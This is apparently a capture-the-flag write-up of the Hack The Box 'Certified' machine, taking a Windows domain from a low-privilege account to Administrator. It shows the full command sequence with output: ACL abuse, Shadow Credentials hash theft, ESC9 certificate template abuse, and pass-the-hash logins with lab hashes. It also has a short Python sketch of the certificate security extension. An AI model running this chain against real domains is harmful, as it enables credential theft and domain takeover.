HTB | Certified

Machine - https://app.hackthebox.com/machines/Certified

Machine Information - As is common in Windows pentests, you will start the Certified box with credentials for the following account: Username: judith.mader Password: judith09

NMAP

└─$ nmap -sC -sV -p 53,88,135,139,389,445,464,3268,3269,5985,9389,49667,49689,49690,49691,49720,49741,49776 10.10.11.41 -Pn -oA nmap_port_details
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-09 12:54 IST
Nmap scan report for 10.10.11.41
Host is up (0.59s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-08-09 14:24:54Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Not valid before: 2025-06-11T21:04:20
|_Not valid after:  2105-05-23T21:04:20
|_ssl-date: 2025-08-09T14:26:35+00:00; +7h00m04s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Not valid before: 2025-06-11T21:04:20
|_Not valid after:  2105-05-23T21:04:20
|_ssl-date: 2025-08-09T14:26:35+00:00; +7h00m04s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-08-09T14:26:33+00:00; +7h00m03s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Not valid before: 2025-06-11T21:04:20
|_Not valid after:  2105-05-23T21:04:20
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49689/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49690/tcp open  msrpc         Microsoft Windows RPC
49691/tcp open  msrpc         Microsoft Windows RPC
49720/tcp open  msrpc         Microsoft Windows RPC
49741/tcp open  msrpc         Microsoft Windows RPC
49776/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-08-09T14:25:57
|_  start_date: N/A
|_clock-skew: mean: 7h00m03s, deviation: 0s, median: 7h00m03s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 126.55 seconds

SMB

judith.mader only has read access to the default shares (IPC$, NETLOGON, SYSVOL); nothing interesting is exposed:

└─$ netexec smb certified.htb -u judith.mader -p judith09 --shares
SMB         10.10.11.41     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.41     445    DC01             [+] certified.htb\judith.mader:judith09 
SMB         10.10.11.41     445    DC01             [*] Enumerated shares
SMB         10.10.11.41     445    DC01             Share           Permissions     Remark
SMB         10.10.11.41     445    DC01             -----           -----------     ------
SMB         10.10.11.41     445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.41     445    DC01             C$                              Default share
SMB         10.10.11.41     445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.41     445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.11.41     445    DC01             SYSVOL          READ            Logon server share 

We can enumerate the domain users:

└─$ netexec smb certified.htb -u judith.mader -p judith09 --users 
SMB         10.10.11.41     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.41     445    DC01             [+] certified.htb\judith.mader:judith09 
SMB         10.10.11.41     445    DC01             -Username-                    -Last PW Set-       -BadPW- -Description-                                               
SMB         10.10.11.41     445    DC01             Administrator                 2024-05-13 14:53:16 0       Built-in account for administering the computer/domain 
SMB         10.10.11.41     445    DC01             Guest                         <never>             0       Built-in account for guest access to the computer/domain 
SMB         10.10.11.41     445    DC01             krbtgt                        2024-05-13 15:02:51 0       Key Distribution Center Service Account 
SMB         10.10.11.41     445    DC01             judith.mader                  2024-05-14 19:22:11 0        
SMB         10.10.11.41     445    DC01             management_svc                2024-05-13 15:30:51 0        
SMB         10.10.11.41     445    DC01             ca_operator                   2024-05-13 15:32:03 0        
SMB         10.10.11.41     445    DC01             alexander.huges               2024-05-14 16:39:08 0        
SMB         10.10.11.41     445    DC01             harry.wilson                  2024-05-14 16:39:37 0        
SMB         10.10.11.41     445    DC01             gregory.cameron               2024-05-14 16:40:05 0        
SMB         10.10.11.41     445    DC01             [*] Enumerated 9 local users: CERTIFIED

Bloodhound

└─$ bloodhound-python -u 'judith.mader' -p 'judith09' -d certified.htb -ns 10.10.11.41 -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: certified.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.certified.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.certified.htb
INFO: Found 10 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.certified.htb
INFO: Done in 01M 21S
INFO: Compressing output into 20250809202730_bloodhound.zip

Foothold/shell

Shell as management_svc

WriteOwner

Analysing the BloodHound data shows two edges of interest:

JUDITH.MADER@CERTIFIED.HTB -> WriteOwner -> MANAGEMENT@CERTIFIED.HTB

and MANAGEMENT_SVC@CERTIFIED.HTB -> MemberOf -> MANAGEMENT@CERTIFIED.HTB

WriteOwner lets judith.mader take ownership of the Management group, so we set her as the group owner of MANAGEMENT@CERTIFIED.HTB:

└─$ bloodyAD --host 10.10.11.41 -d certified.htb -u 'judith.mader' -p 'judith09' set owner management  judith.mader
[+] Old owner S-1-5-21-729746778-2675978091-3820388244-512 is now replaced by judith.mader on management

Next, as the new owner, we grant judith.mader full control over the group's DACL:

└─$ impacket-dacledit -action write -rights FullControl -target 'management' -principal 'judith.mader' certified.htb/'judith.mader':'judith09' -dc-ip 10.10.11.41
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] DACL backed up to dacledit-20250809-210119.bak
[*] DACL modified successfully!

With FullControl on the group, we add judith.mader as a member:

└─$ bloodyAD --host 10.10.11.41 -d certified.htb -u 'judith.mader' -p 'judith09' add groupMember management 'judith.mader'                                       
[+] judith.mader added to management

GenericWrite

Since Management has GenericWrite over management_svc, we can use either targeted Kerberoasting or Shadow Credentials.

We will use Shadow Credentials to obtain the NT hash:

└─$ certipy shadow auto -account 'management_svc' -u 'judith.mader@certified.htb' -p 'judith09' -dc-ip 10.10.11.41
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Targeting user 'management_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'cae378b3cb274386b4a26c37f2b62448'
[*] Adding Key Credential with device ID 'cae378b3cb274386b4a26c37f2b62448' to the Key Credentials for 'management_svc'
[*] Successfully added Key Credential with device ID 'cae378b3cb274386b4a26c37f2b62448' to the Key Credentials for 'management_svc'
[*] Authenticating as 'management_svc' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'management_svc@certified.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'management_svc.ccache'
[*] Wrote credential cache to 'management_svc.ccache'
[*] Trying to retrieve NT hash for 'management_svc'
[*] Restoring the old Key Credentials for 'management_svc'
[*] Successfully restored the old Key Credentials for 'management_svc'
[*] NT hash for 'management_svc': a091c1832bcdd4677c28b5a6a1295584

Since management_svc is a member of Remote Management Users, we can log in over WinRM, which gives us user.txt:

└─$ evil-winrm -i 10.10.11.41 -u management_svc -H a091c1832bcdd4677c28b5a6a1295584 
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\management_svc\Documents> dir ..\Desktop

    Directory: C:\Users\management_svc\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         8/9/2025   7:13 AM             34 user.txt

Privilege Escalation

GenericAll

management_svc has GenericAll over ca_operator, so we can repeat the Shadow Credentials attack to obtain the NT hash for ca_operator:

└─$ certipy shadow auto -account ca_operator -username management_svc@certified.htb -hashes :a091c1832bcdd4677c28b5a6a1295584 -dc-ip 10.10.11.41
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Targeting user 'ca_operator'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '4b220ea59d294026bcc588810decf172'
[*] Adding Key Credential with device ID '4b220ea59d294026bcc588810decf172' to the Key Credentials for 'ca_operator'
[*] Successfully added Key Credential with device ID '4b220ea59d294026bcc588810decf172' to the Key Credentials for 'ca_operator'
[*] Authenticating as 'ca_operator' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'ca_operator@certified.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ca_operator.ccache'
[*] Wrote credential cache to 'ca_operator.ccache'
[*] Trying to retrieve NT hash for 'ca_operator'
[*] Restoring the old Key Credentials for 'ca_operator'
[*] Successfully restored the old Key Credentials for 'ca_operator'
[*] NT hash for 'ca_operator': b4b86f45c6018f1b664f70805f45d8f2

ESC9

Running certipy find as ca_operator flags the CertifiedAuthentication template as vulnerable to ESC9:

└─$ certipy find -u ca_operator -hashes :b4b86f45c6018f1b664f70805f45d8f2 -target 10.10.11.41 -text -stdout -vulnerable
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'certified-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'certified-DC01-CA'
[*] Checking web enrollment for CA 'certified-DC01-CA' @ 'DC01.certified.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : certified-DC01-CA
    DNS Name                            : DC01.certified.htb
    Certificate Subject                 : CN=certified-DC01-CA, DC=certified, DC=htb
    Certificate Serial Number           : 36472F2C180FBB9B4983AD4D60CD5A9D
    Certificate Validity Start          : 2024-05-13 15:33:41+00:00
    Certificate Validity End            : 2124-05-13 15:43:41+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : CERTIFIED.HTB\Administrators
      Access Rights
        ManageCa                        : CERTIFIED.HTB\Administrators
                                          CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        ManageCertificates              : CERTIFIED.HTB\Administrators
                                          CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        Enroll                          : CERTIFIED.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : CertifiedAuthentication
    Display Name                        : Certified Authentication
    Certificate Authorities             : certified-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectRequireDirectoryPath
    Enrollment Flag                     : PublishToDs
                                          AutoEnrollment
                                          NoSecurityExtension
    Extended Key Usage                  : Server Authentication
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1000 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2024-05-13T15:48:52+00:00
    Template Last Modified              : 2024-05-13T15:55:20+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CERTIFIED.HTB\operator ca
                                          CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : CERTIFIED.HTB\Administrator
        Full Control Principals         : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        Write Owner Principals          : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        Write Dacl Principals           : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        Write Property Enroll           : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
    [+] User Enrollable Principals      : CERTIFIED.HTB\operator ca
    [!] Vulnerabilities
      ESC9                              : Template has no security extension.
    [*] Remarks
      ESC9                              : Other prerequisites may be required for this to be exploitable. See the wiki for more details.

ESC9 vulnerabilities arise when a certificate template is explicitly configured not to include the szOID_NTDS_CA_SECURITY_EXT (OID 1.3.6.1.4.1.311.25.2) security extension in the certificates it issues. This extension, which contains the requester's SID, was introduced by Microsoft as part of the May 2022 "Certifried" updates (CVE-2022-26923 and KB5014754) to enable "strong certificate mapping". Strong mapping allows DCs to reliably and securely map a presented client certificate to a specific user or computer account in Active Directory using its SID.
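To make concrete what the NoSecurityExtension flag removes, here is an added example (not part of the original writeup, and not Certipy's code) that encodes and decodes the szOID_NTDS_CA_SECURITY_EXT value in pure Python and classifies whether a certificate carries strong-mapping material. The DER layout and the helper names are assumptions of mine; the SID used in the sample is the Administrator SID shown later on this page.

```python
# Added example, not from the original writeup: a minimal pure-Python encoder and decoder
# for the szOID_NTDS_CA_SECURITY_EXT value (OID 1.3.6.1.4.1.311.25.2) that the template's
# NoSecurityExtension flag strips. It carries the requester's SID as ASCII inside an OtherName:
# SEQUENCE { [0] { OID 1.3.6.1.4.1.311.25.2.1, [0] EXPLICIT { OCTET STRING sid } } } (assumed).

NTDS_CA_SECURITY_EXT = "1.3.6.1.4.1.311.25.2"
OBJECTSID_OID_DER = bytes.fromhex("2b060104018237190201")  # 1.3.6.1.4.1.311.25.2.1, DER contents

def _der_len(n):
    """DER length: short form below 128, long form (0x80|N, then N big-endian bytes) above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def _tlv(tag, payload):
    return bytes([tag]) + _der_len(len(payload)) + payload

def build_security_ext(sid):
    """Encode the extension value a CA embeds when the security extension is enabled."""
    other_name = _tlv(0x06, OBJECTSID_OID_DER) + _tlv(0xA0, _tlv(0x04, sid.encode("ascii")))
    return _tlv(0x30, _tlv(0xA0, other_name))

def _expect(buf, pos, tag):
    """Parse the TLV at buf[pos], require the given tag, return (value, next_pos)."""
    if pos + 2 > len(buf) or buf[pos] != tag:
        raise ValueError("unexpected tag or truncated header")
    first, pos = buf[pos + 1], pos + 2
    length = first
    if first & 0x80:  # long-form length
        nbytes = first & 0x7F
        if nbytes == 0 or pos + nbytes > len(buf):
            raise ValueError("bad long-form length")
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    if pos + length > len(buf):
        raise ValueError("truncated value")
    return buf[pos:pos + length], pos + length

def extract_sid(ext_value):
    """Return the SID string from a szOID_NTDS_CA_SECURITY_EXT value, or None if malformed."""
    try:
        seq, _ = _expect(ext_value, 0, 0x30)
        other_name, _ = _expect(seq, 0, 0xA0)
        oid, nxt = _expect(other_name, 0, 0x06)
        if oid != OBJECTSID_OID_DER:
            return None
        explicit, _ = _expect(other_name, nxt, 0xA0)
        sid, _ = _expect(explicit, 0, 0x04)
        return sid.decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None

def mapping_basis(extensions, san_upn):
    """What a DC can map the cert on: ('strong', sid) from the extension, else ('weak', upn)."""
    raw = extensions.get(NTDS_CA_SECURITY_EXT)
    sid = extract_sid(raw) if raw is not None else None
    return ("strong", sid) if sid else ("weak", san_upn)

if __name__ == "__main__":
    # Constructed sample: the Administrator SID from the writeup in a normally issued cert,
    # beside a cert from the NoSecurityExtension template that carries only a UPN.
    admin_sid = "S-1-5-21-729746778-2675978091-3820388244-500"
    print(mapping_basis({NTDS_CA_SECURITY_EXT: build_security_ext(admin_sid)}, "administrator"))
    print(mapping_basis({}, "administrator"))
```

The second call is the ESC9 situation: with no SID in the certificate, the only identity left for the DC to map on is the UPN, which is exactly the attribute the steps below change.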

ESC9 can be exploited in a couple of primary ways:

  1. With UPN Manipulation (in Compatibility Mode or Disabled Mode)

  2. Combined with ESC6 (CA allows SAN specification)

We will use the first method.

Step 1: Read initial UPN of the victim account (Optional - for restoration).

└─$ certipy account -u ca_operator -hashes :b4b86f45c6018f1b664f70805f45d8f2 -dc-ip '10.10.11.41' -user 'Administrator'  read 
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Reading attributes for 'Administrator':
    cn                                  : Administrator
    distinguishedName                   : CN=Administrator,CN=Users,DC=certified,DC=htb
    name                                : Administrator
    objectSid                           : S-1-5-21-729746778-2675978091-3820388244-500
    sAMAccountName                      : Administrator
    userAccountControl                  : 66048
    whenCreated                         : 2024-05-13T15:02:18+00:00
    whenChanged                         : 2025-08-09T14:13:08+00:00

Step 2: Update the victim account's UPN to the target administrator's sAMAccountName.

management_svc has GenericAll over ca_operator, which means full control over that AD object, including the ability to change its userPrincipalName:

└─$ certipy account -u management_svc -hashes :a091c1832bcdd4677c28b5a6a1295584 -dc-ip '10.10.11.41' -upn 'administrator' -user 'ca_operator' update
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_operator':
    userPrincipalName                   : administrator
[*] Successfully updated 'ca_operator'

Step 3: Request a certificate as the "victim" user from the ESC9 template.

└─$ certipy req -u ca_operator -hashes :b4b86f45c6018f1b664f70805f45d8f2 -dc-ip '10.10.11.41' -ca 'certified-DC01-CA' -template 'CertifiedAuthentication'
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 6
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

Step 4: Revert the "victim" account's UPN to its original value.

└─$ certipy account -u management_svc -hashes :a091c1832bcdd4677c28b5a6a1295584 -dc-ip '10.10.11.41' -upn 'ca_operator' -user 'ca_operator' update
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_operator':
    userPrincipalName                   : ca_operator
[*] Successfully updated 'ca_operator'

Step 5: Authenticate as the target administrator.

└─$ certipy auth  -dc-ip '10.10.11.41' -pfx 'administrator.pfx' -username 'administrator' -domain 'certified.htb'
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator'
[*] Using principal: 'administrator@certified.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34

Now we can log in over WinRM with the hash and read root.txt:

└─$ evil-winrm -i certified.htb -u administrator -H 0d5b49608bbce1751f708748f67e2d34
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir ..\Desktop

    Directory: C:\Users\Administrator\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         8/9/2025   7:13 AM             34 root.txt
